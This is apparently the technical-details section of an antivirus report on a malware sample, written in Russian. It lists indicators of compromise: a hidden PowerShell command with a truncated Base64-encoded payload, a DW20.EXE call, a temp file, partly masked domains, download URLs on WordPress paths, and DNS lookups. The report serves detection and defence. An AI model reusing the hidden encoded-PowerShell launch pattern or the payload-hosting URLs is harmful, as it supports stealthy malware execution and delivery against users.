Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABNAHYAbwBxAG8AYQB5AGUAdgBpAHIAPQAnAEUAZwB6AHgAawBiAHIAbQBqAHUAYQBhAGQAJwA7ACQAQgBqAG8AeABmAHMAegB4AGYAbwAgAD0AIAAnADkAOQA2ACcAOwAkAEoAZgBpAHIAdABiAGgAZgBxAHY...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
- %TEMP%\1229490.cvr
- 'jm#.#cu.ac.th':80
- 'sc##and.com':443
- 'tr#####supplements.com':443
- 'ji###tri.com':80
- 'gl######nsultoria.online':80
- 'gl######nsultoria.online':443
- http://jm#.#cu.ac.th/wp-content/i6ggtbs-htbcgtg4g-78/
- http://ji###tri.com/wp-admin/mskbSz/
- http://www.ji###tri.com/wp-admin/mskbSz/
- http://gl######nsultoria.online/sobracil/876pdn8xc-io83gn-1437/
- 'sc##and.com':443
- 'tr#####supplements.com':443
- 'gl######nsultoria.online':443
- DNS ASK jm#.#cu.ac.th
- DNS ASK sc##and.com
- DNS ASK tr#####supplements.com
- DNS ASK ji###tri.com
- DNS ASK gl######nsultoria.online